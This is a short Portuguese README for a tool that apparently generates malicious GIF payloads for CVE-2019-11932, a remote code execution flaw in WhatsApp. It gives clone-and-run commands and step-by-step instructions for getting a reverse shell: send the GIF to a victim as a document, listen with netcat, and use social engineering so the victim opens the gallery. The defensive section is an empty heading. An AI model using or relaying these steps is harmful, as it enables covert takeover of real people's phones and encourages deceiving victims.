WhatsPayloadRCE
Este é um payload de geração automatizada para CVE-2019-11932 (Remote Code Execution no WhatsApp)
- Instalação automática do GCC (comando inofensivo, você pode ver que isso é código aberto)
- Salvando em arquivo .GIF
Como Usar ?
sudo apt install git
git clone https://github.com/Err0r-ICA/WhatsPayloadRCE
cd WhatsPayloadRCE && bash start
Captura de Tela

Como Obter Shell ?
- Basta enviar o arquivo .GIF para o usuário vítima COMO DOCUMENTO, NÃO COMO IMAGEM
- E configure o nc / netcat para a porta que você definiu na ferramenta WhatsRCE {nc -lnvp your_port}
- Você pode usar o ataque de Engenharia Social para que as vítimas sejam atraídas a executar este exploit
- Diga à vítima para abrir a galeria pelo WhatsApp e peça para a vítima enviar qualquer foto. Depois disso, alguns segundos depois, você receberá uma conexão shell da vítima
Como Evitar Esse Ataque?